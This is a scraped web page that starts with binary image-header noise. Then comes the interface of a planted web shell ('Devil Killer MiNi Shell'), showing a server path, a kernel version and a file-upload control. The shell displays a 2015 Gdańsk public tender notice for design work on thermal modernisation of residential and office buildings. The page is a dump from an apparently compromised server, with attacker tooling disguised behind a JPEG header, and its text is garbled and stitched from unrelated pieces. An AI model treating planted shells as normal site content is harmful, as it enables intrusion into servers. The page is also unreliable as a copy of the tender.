JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150506/105020-N-2015.html

<p class="kh_header"><b>Gdańsk: opracowanie dokumentacji wielobranżowej projektowo - kosztorysowej termomodernizacji budynków przy ul. Chłodnej 9, 10, 14 i Toruńskiej 23 z przebudową  lokali oraz przy ul. Mściwoja II 44,  a także sprawowanie  nadzorów autorskich nad robotami wykonywanymi  według sporządzonej dokumentacji projektowej</b><br>
<b>Numer ogłoszenia: 105020 - 2015; data zamieszczenia: 06.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gdański Zarząd Nieruchomości Komunalnych - Samorządowy Zakład Budżetowy , ul. Partyzantów 74, 80-254 Gdańsk, woj. pomorskie, tel. 58 3201032, 3200220, 3023282, faks 58 3458235.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gznk.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie dokumentacji wielobranżowej projektowo - kosztorysowej termomodernizacji budynków przy ul. Chłodnej 9, 10, 14 i Toruńskiej 23 z przebudową  lokali oraz przy ul. Mściwoja II 44,  a także sprawowanie  nadzorów autorskich nad robotami wykonywanymi  według sporządzonej dokumentacji projektowej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: <br>
a)	opracowanie dokumentacji wielobranżowej projektowo - kosztorysowej termomodernizacji budynków  mieszkalnych i wykonanie audytów energetycznych dla budynków przy ul. Chłodnej 9 (działka Nr 153/6 obr.100), Chłodnej 10 (działka nr 151 i 152 obr. 100), Chłodnej 14 (działka nr 139 obr. 100) i Toruńskiej 23 (działka nr 184/1) wraz z przebudową  lokali celem ich usamodzielnienia, zgodnie z planem zagospodarowania terenu w zakresie wymaganym prawem budowlanym i przepisami wykonawczymi w oparciu o wytyczne Wojewódzkiego Urzędu Ochrony Zabytków w Gdańsku - Pomorskiego Wojewódzkiego Konserwatora Zabytków z dnia 05.01.2015 r. <br>

b)	opracowanie dokumentacji wielobranżowej projektowo - kosztorysowej termomodernizacji budynku  użytkowego siedziby BOM 7 GZNK SZB przy ul Mściwoja II 44 (działki nr 308, 309, 310, 311, 312  obr.016), zgodnie z planem zagospodarowania terenu w zakresie wymaganym prawem budowlanym i przepisami wykonawczymi.<br>
 
c)	sprawowanie nadzoru autorskiego w zakresie:
<br>
- stwierdzenia w toku wykonania robót budowlanych zgodności realizacji z projektem,
<br>
- uzgodnienia możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w projekcie a zgłaszanych przez kierownika budowy lub inspektora nadzoru inwestorskiego i zgodnie z zawartą umową.<br>

2.	Charakterystyka obiektów:  <br>

a)	budynek przy ul. Chłodnej 9 o kubaturze 4.616,00 m3 jest murowany, czterokondygnacyjny z poddaszem nieużytkowym, w całości podpiwniczony. W budynku znajduje się 16 lokali mieszkalnych.<br>

      Mieszkanie nr 4 jest lokalem samodzielnym i nie podlega przebudowie.  Budynek wyposażony jest  w instalacje wod-kan, gazową, elektryczną. Ogrzewanie piecowe,<br>

b)	budynek przy ul. Chłodnej 10 o kubaturze 6.105.00 m3 jest murowany, czterokondygnacyjny z poddaszem nieużytkowym, w całości podpiwniczony. W budynku znajduje się 16 lokali mieszkalnych.<br>

	Budynek wyposażony jest  w instalacje wod-kan, gazową i elektryczną. Ogrzewanie piecowe,<br>

c)	budynek przy ul. Chłodnej 14 o kubaturze 2.450,00 m3 jest murowany, trzykondygnacyjny z poddaszem w części użytkowym, w całości podpiwniczony. W budynku znajduje się 6 lokali mieszkalnych. Budynek wyposażony jest w instalacje wod-kan, gazową i elektryczną. Ogrzewanie piecowe,<br>
 
d)	budynek przy ul. Toruńskiej 23 o kubaturze 2.694,00 m3 jest murowany, czterokondygnacyjny z poddaszem w części użytkowym, w całości podpiwniczony. W budynku znajduje się 6 lokali mieszkalnych i sklep spożywczy. Budynek wyposażony jest w instalacje wod-kan, gazową i elektryczną. Ogrzewanie piecowe. Dobudówka (oficyna) od strony wnętrza  podwórza przewidziana jest do rozbiórki,<br>

e)	budynek przy ul. Mściwoja II 44 o kubaturze 2 450,00 m3 jest murowany, w części dwukondygnacyjny  niepodpiwniczony. W budynku mieści się siedziba Biura Obsługi Mieszkańców nr 7. Budynek wyposażony jest w instalacje wod-kan i elektryczną. Ogrzewanie z kotłowni  na paliwo stałe.<br>

3.		Przedmiot zamówienia obejmuje wykonanie wielobranżowej dokumentacji projektowo - kosztorysowej  	dla każdego obiektu osobno w  następującym zakresie:<br>

3.1	ul. Chłodna 9, ul. Chłodna 10, ul. Chłodna 14 i ul. Toruńska 23<br>

1)	Inwentaryzacja  architektoniczno -budowlana i instalacyjna.<br>

2)	Koncepcja przebudowy obiektu w dwóch wariantach w zakresie usamodzielnienia lokali mieszkalnych. Powyższe warianty rozwiązań należy przedłożyć do uzgodnienia  GZNK SZB w terminie 3 tygodni od podpisania umowy.<br>

3)	Audyt energetyczny wykonany zgodnie z ustawą z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów (tekst jednolity Dz. U. 2014r. poz. 712) i  Rozporządzeniem Ministra Infrastruktury z dnia 17 marca 2009 r. (Dz.U. 2009 nr 43 poz. 346 z późn. zmianami) w sprawie szczegółowego zakresu i form audytu energetycznego oraz części audytu remontowego, wzorów kart audytów, a także algorytmu oceny opłacalności przedsięwzięcia termomodernizacyjnego, który będzie stanowił wytyczne do projektu.<br>

4)	Program prac konserwatorskich dla elewacji budynku jako element projektu budowlanego.<br>

5)	Projekt budowlany:<br>
 
a)	branża architektoniczno - konstrukcyjna: projekt usamodzielnienia lokali mieszkalnych, projekt termomodernizacji budynku (docieplenia  ścian oraz stropów, izolacje przeciwwilgociowe) wraz z kolorystyką elewacji ścian ocieplonych i renowacją ścian zewnętrznych ocieplonych od wewnątrz,<br>

b)	branża elektryczna w tym instalacje odgromowe,<br>

c)	branża teletechniczna: np. telekomunikacyjna, domofonowa, telefoniczna, telewizji kablowej, anten zbiorczych - w zależności do wymagań,<br>

d)	branża sanitarna - instalacje:  wod-kan., gazowa, centralnego ogrzewania, ciepłej wody użytkowej,<br>

e)	projekt węzła cieplnego dwufunkcyjnego (c.o. i c.w.u.),<br>

f)	projekt rozbiórki przybudówki ( ul.Toruńska 23)<br>

g)	orzeczenie techniczne o stanie budynków.<br>

6)	Projekt  wykonawczy:<br>

a)	branża architektoniczno - konstrukcyjna: projekt usamodzielnienia lokali mieszkalnych, projekt termomodernizacji budynku (docieplenia ścian oraz stropów, izolacje przeciwwilgociowe) wraz z kolorystyką elewacji ścian ocieplonych i renowacją ścian zewnętrznych ocieplonych od wewnątrz,<br>

b)	branża elektryczna w tym instalacje odgromowe,<br>

c)	branża teletechniczna: np. telekomunikacyjna, domofonowa, telefoniczna, telewizji kablowej, anten zbiorczych - w zależności do wymagań,<br>

d)	branża sanitarna - instalacje: wod-kan., gazowa, wentylacyjna centralnego ogrzewania, ciepłej wody użytkowej,<br>

e)	projekt węzła cieplnego dwufunkcyjnego (c.o. i c.w.u.),<br>

f)	projekt rozbiórki przybudówki (ul.Toruńska 23)<br>

g)	orzeczenie techniczne o stanie budynków.<br>

7)	Specyfikacje techniczne wykonania i odbioru robót budowlanych.<br>

8)	Przedmiary robót.<br>

9)	Kosztorysy inwestorskie.<br>

10)	Informacje dotyczące bezpieczeństwa i ochrony zdrowia.<br>

11)	Charakterystyka energetyczna budynku.<br>

12)	Uzgodnienia ekspertyzy technicznej rzeczoznawcy budowlanego i rzeczoznawcy ds. zabezpieczeń p.poż. z właściwym Komendantem 	Wojewódzkim Państwowej Straży Pożarnej lub Państwowym Wojewódzkim Inspektorem  Sanitarnym odpowiednio do przedmiotu ekspertyzy.<br>

13)	Uzgodnienie dokumentacji projektowej z  rzeczoznawcą  ds. sanitarno - higienicznych.<br>

14)	Uzyskanie wymaganych warunków technicznych i uzgodnień od gestorów sieci, uzbrojenia podziemnego, zarządców terenu (między innymi SAUR-Neptun, ENERGA, ZDiZ oraz innych koniecznych uzgodnień wynikających z zakresu opracowanej dokumentacji a niezbędnych do uzyskania decyzji pozwolenia na budowę) oraz Zespołu Uzgodnienia Dokumentacji Projektowej.<br>

15)	Uzyskanie pozytywnej opinii Wojewódzkiego Konserwatora Zabytków.<br>

16)	Uzgodnienie dokumentacji węzła cieplnego z GPEC pod kątem przyszłego przekazania węzła na majątek GPEC<br>

17)	Sprawowanie nadzoru autorskiego w czasie realizacji robót stanowiących przedmiot opracowanej dokumentacji.<br>

3.2	ul. Mściwoja II 44.<br>

1)	Inwentaryzacja architektoniczno - budowlana i instalacyjna<br>

2)	Projekty budowlane i wykonawcze:<br>

a)	projekty termomodernizacji budynku (docieplenia ścian oraz stropów, izolacji przeciwwilgociowych wraz z kolorystyką elewacji ścian ocieplonych) zgodnie z załączonym audytem energetycznym, <br>

b)	projekt węzła cieplnego jednofunkcyjnego (c.o.),<br>

c)	wewnętrznych instalacji centralnego ogrzewania,<br>

d)	orzeczenie techniczne o stanie budynku,<br>

e)	w projekcie należy uwzględnić, w stosunku do rozwiązań zawartych w audycie energetycznym 	następujące zmiany:
<br>
- węzeł cieplny jednofunkcyjny zamiast źródła ciepła przedstawionego w audycie,<br>

- przygotowanie ciepłej wody użytkowej za pomocą istniejących podgrzewaczy elektrycznych wody,<br>

- wentylację grawitacyjną bez jej zamiany na wentylację mechaniczną z rekuperatorem,<br>

- instalację wewnętrzną c.o. należy zaprojektować na parametry odpowiadające podłączeniu do miejskiego systemu ciepłowniczego, tj. maksymalne temperatury 70/50oC.<br>

3)	Specyfikacje techniczne wykonania i odbioru robót budowlanych.<br>

4)	Przedmiary robót.<br>

5)	Kosztorysy inwestorskie.<br>

6)	Informacje dotyczące bezpieczeństwa i ochrony zdrowia.<br>

7)	Charakterystyka energetyczna budynku.<br>

8)	Uzgodnienia ekspertyzy technicznej rzeczoznawcy budowlanego i rzeczoznawcy ds. zabezpieczeń p. poż. z właściwym Komendantem Wojewódzkim Państwowej Straży Pożarnej lub Państwowym	Wojewódzkim Inspektorem  Sanitarnym odpowiednio do przedmiotu ekspertyzy.<br>

9)	Uzgodnienie dokumentacji projektowej z  rzeczoznawcą  ds. sanitarno - higienicznych.<br>

10)	Uzyskanie wymaganych warunków technicznych i uzgodnień od gestorów sieci, uzbrojenia podziemnego, zarządców terenu (między innymi SAUR-Neptun, ENERGA, ZDiZ) oraz innych koniecznych uzgodnień wynikających z zakresu opracowanej dokumentacji a niezbędnych do uzyskania decyzji pozwolenia na budowę) oraz Zespołu Uzgodnienia Dokumentacji Projektowej.<br>

11)	Sprawowanie nadzoru autorskiego w czasie realizacji robót stanowiących przedmiot opracowanej dokumentacji.<br>

ponadto<br>

3.3	Przedmiot zamówienia obejmuje wykonanie i załączenie do dokumentacji  Tabel do monitorowania realizacji programu  sporządzonych wg wzoru zamawiającego stanowiącego zał. nr 10 do siwz, z wypełnionymi pkt. 10, 11, 12, 14 i 15  Tabeli do rocznego sprawozdania w zakresie działań związanych z redukcją emisji powierzchniowej  dla poszczególnych obiektów wraz z dokumentacją zdjęciową przeznaczonych do likwidacji pieców węglowych.<br>

4.	Dokumenty przekazane przez zamawiającego w celu prawidłowego przygotowania dokumentacji:<br>

a)	wytyczne Pomorskiego Wojewódzkiego Konserwatora Zabytków dotyczące termomodernizacji kamienic - pismo Nr ZN.5183.572.2014.AK z dnia 05.01.2015 r.  -  załącznik nr 1  do siwz,<br>

b)	karta terenu do miejscowego planu zagospodarowania przestrzennego Śródmieście rejon ulic Chłodnej i Sadowej w mieście Gdańsk - numer terenu  001, nr ew. planu 1132 - załącznik nr 2A do siwz,<br>

c)	karta terenu miejscowego planu zagospodarowania przestrzennego Śródmieście rejon Dolnego Miasta części mieszkaniowej w mieście Gdańsku - numer 017, nr ew. planu 1124 - załącznik nr 2B do siwz,<br>

d)	karta terenu do miejscowego planu zagospodarowania przestrzennego Oliwa rejon ulicy Poznańskiej w mieście Gdańsku - karta terenu numer 001, nr ew. planu 0114 -    załącznik nr 2C do siwz,<br>

e)	informacja uproszczona  z rejestru gruntów  + informacja  z mapy ewidencyjnej ul. Chłodna   9 - załącznik  3A do siwz,<br>

f)	informacja uproszczona  z rejestru gruntów  + informacja  z mapy ewidencyjnej ul. Chłodna 10 - załącznik  3B do siwz,<br>

g)	informacja uproszczona  z rejestru gruntów  + informacja  z mapy ewidencyjnej ul. Chłodna 14 - załącznik  3C do siwz,<br>

h)	informacja uproszczona  z rejestru gruntów  + informacja  z mapy ewidencyjnej ul. Toruńska 23 - załącznik 3D do siwz,<br>

i)	informacja uproszczona  z rejestru gruntów  + informacja  z mapy ewidencyjnej ul. Mściwoja II 44 - załącznik 3E do siwz,<br>
 
j)	protokół nr 34/2014 z okresowej kontroli przewodów kominowych ul Chłodna 9 - załącznik nr 4 A do siwz,<br>

k)	protokół nr 35/2014 z okresowej kontroli przewodów kominowych ul Chłodna 10 - załącznik nr 4B do siwz,<br>

l)	protokół nr 36/2014 z okresowej kontroli przewodów kominowych ul Chłodna 14 - załącznik nr 4 C do siwz,<br>

m)	protokół nr 352/2014 z okresowej kontroli przewodów kominowych ul. Toruńska 23 - załącznik nr 4 D do siwz,<br>

n)	protokół nr 806/BOM/2014 z okresowej kontroli przewodów kominowych ul. Mściwoja II 44 -załącznik 4 E do siwz do siwz,<br>

o)	warunki przyłączenia węzła cieplnego do sieci ciepłowniczej GPEC Sp. z o.o nr WT/GPEC/00051/2015 - ul. Chłodna 9 - załącznik nr 5 A do siwz,<br>

p)	warunki przyłączenia węzła cieplnego do sieci ciepłowniczej GPEC Sp. z o.o nr WT/GPEC/00049/2015 - ul. Chłodna 10 - załącznik nr 5 B do siwz,<br>

q)	warunki przyłączenia węzła cieplnego do sieci ciepłowniczej GPEC Sp. z o.o nr WT/GPEC/00050/2015 - ul. Chłodna 14 -  załącznik nr 5 C do siwz,<br>
 
r)	warunki przyłączenia węzła cieplnego do sieci ciepłowniczej GPEC Sp. z o.o nr WT/GPEC/00048/2015 - ul. Toruńska 23 -  załącznik nr 5 D do siwz,<br>

s)	warunki przyłączenia węzła cieplnego do sieci ciepłowniczej GPEC Sp. z o.o nr WT/GPEC/00233/2014 -  ul. Mściwoja II 44 -załącznik  5 E do siwz,<br>

t)	warunki przyłączenia do sieci gazowej nr WI/G-EGT/247/2015 -  ul. Chłodna 9 - załącznik nr 6 A do siwz,<br>

u)	warunki przyłączenia do sieci gazowej nr WI/G-EGT/248/2015 -  ul. Chłodna 10 - załącznik nr 6 B do siwz,<br>

v)	warunki przyłączenia do sieci gazowej nr WI/G-EGT/236/2015 -  ul. Chłodna 14 - załącznik nr 6 C do siwz,<br>

w)	warunki przyłączenia do sieci gazowej nr WI/G-EGT/249/2015 -  ul. Toruńska 23 - załącznik nr 6 D do siwz,<br>

x)	Audyt energetyczny budynku użytkowego komunalnego zlokalizowanego w Gdańsku przy ul. Mściwoja II 44 Biuro Obsługi Mieszkańców wykonany przez Pomorską Radę Federacji Stowarzyszeń Naukowo-Technicznych Naczelnej Organizacji Technicznej - załącznik nr 7 do siwz.<br>

	Uwaga: Załączony audyt energetyczny zostanie zaktualizowany przez autorów opracowania przy niezbędnych konsultacjach z Jednostką Projektowania wyłonioną w postępowaniu przetargowym na zlecenia Zamawiającego.<br>

y)	Założenia wyjściowe do kosztorysów inwestorskich - załącznik nr 8 do siwz.<br>

z)	Założenia wyjściowe do projektowania- załącznik nr 9 do siwz.<br>

aa)	Wzór tabel do monitorowania realizacji programu - załącznik nr 10 do siwz.<br>

5.	Pozostałe warunki wykonania zamówienia określone są we wzorze umowy stanowiącym  załącznik do SIWZ.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.22.10.00-3, 71.24.80.00-8, 71.32.00.00-7, 71.31.43.00-5, 71.31.40.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości 9 600,00 zł. w tym: <br>
ZADANIE 1 -     5 000,00  zł<br>

ZADANIE 2 -     3 800,00  zł<br>

ZADANIE 3 -        800,00  zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku posiadania wiedzy i doświadczenia Wykonawca musiał wykonać w okresie ostatnich trzech lat przed upływem terminu składania ofert <br>
w przypadku składania oferty na Zadanie 1 i/lub Zadanie 2 <br> 
lub <br>
w przypadku składania oferty na Zadanie 1 lub Zadanie 2 i Zadanie 3 <br>
lub<br>
w przypadku składania oferty na trzy Zadania razem, tj. Zadanie 1, Zadanie 2 i Zadanie 3<br> 
- minimum 2 usługi polegające na opracowaniu dokumentacji projektowej obejmujące branżę architektoniczną, konstrukcyjną i instalacyjne remontów obiektów o wartości minimum  40 000,00 zł brutto każda, objętych ochroną Konserwatora Zabytków  tj. znajdujących się w Gminnej Ewidencji Zabytków  lub Wojewódzkim Rejestrze Zabytków Nieruchomych.<br>
- minimum 1 usługę polegającą na wykonaniu audytu energetycznego dla obiektów mieszkalnych wielorodzinnych, wielokondygnacyjnych zgodnie z ustawą z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów (tekst jednolity Dz. U. 2014r. poz. 712) i  Rozporządzeniem Ministra Infrastruktury z dnia 17 marca 2009 r. (Dz.U. 2009 nr 43 poz. 346 z późn. zmianami) w sprawie szczegółowego zakresu i form audytu energetycznego oraz części audytu remontowego, wzorów kart audytów, a także algorytmu oceny opłacalności przedsięwzięcia termomodernizacyjnego, <br>
W przypadku składania oferty tylko i wyłącznie na Zadanie 3<br>
- minimum 2 usługi polegające na opracowaniu dokumentacji projektowej obejmującą branżę architektoniczną, konstrukcyjną i instalacyjną remontów obiektów o wartości minimum  20 000,00 zł brutto każda.<br>

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków udowadniając, iż będzie dysponował  tymi zasobami w trakcie  realizacji zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Wykonawca musi wykazać dysponowanie:<br> 
- 1  osobą posiadającą  przygotowanie  zawodowe  do  pełnienia  samodzielnych funkcji technicznych w budownictwie, upoważniające  do  projektowania  w  specjalności architektonicznej bez ograniczeń,<br>
- 1 osobą, posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń, <br>
- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, <br>
- 1 osobą posiadającą przygotowanie zawodowe do pełnienia samodzielnych funkcji technicznych w budownictwie, upoważniające do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, <br>
- 1 osobą posiadającą kwalifikacje w specjalności konserwacji i restauracji dzieł sztuki zgodnie z  § 22 ust. 1 Rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. Nr 165 poz. 987).<br>

Wykonawcy, którzy ubiegają się wspólnie o udzielenie zamówienia w/w warunek mogą spełniać łącznie.<br>

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, udowadniając, iż będzie dysponował osobami zdolnymi do wykonania zamówienia w trakcie realizacji zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Przez główne usługi Zamawiający rozumie:<br>
w przypadku składania oferty na Zadanie 1 i/lub Zadanie 2 lub w przypadku składania oferty na Zadanie 1 lub Zadanie 2 i Zadanie 3 lub w przypadku składania oferty na trzy Zadania razem, tj. Zadanie 1, Zadanie 2 i Zadanie 3  wykonanie:<br> 
1)	dokumentacji projektowej obejmujące branże architektoniczną, konstrukcyjną i instalacyjne remontów obiektów objętych ochroną Konserwatora Zabytków o wartości minimum  40 000,00 zł brutto, <br>
2)	audytu energetycznego dla obiektów mieszkalnych wielorodzinnych, wielokondygnacyjnych zgodnie z ustawą z dnia 21 listopada 2008 r. o wspieraniu termomodernizacji i remontów (tekst jednolity Dz. U. 2014r. poz. 712) i Rozporządzeniem Ministra Infrastruktury z dnia 17 marca 2009 r. (Dz.U. 2009 nr 43 poz. 346 z późn. zmianami) w sprawie szczegółowego zakresu i form audytu energetycznego oraz części 	audytu remontowego, wzorów kart audytów, a także algorytmu oceny opłacalności przedsięwzięcia termomodernizacyjnego.<br>
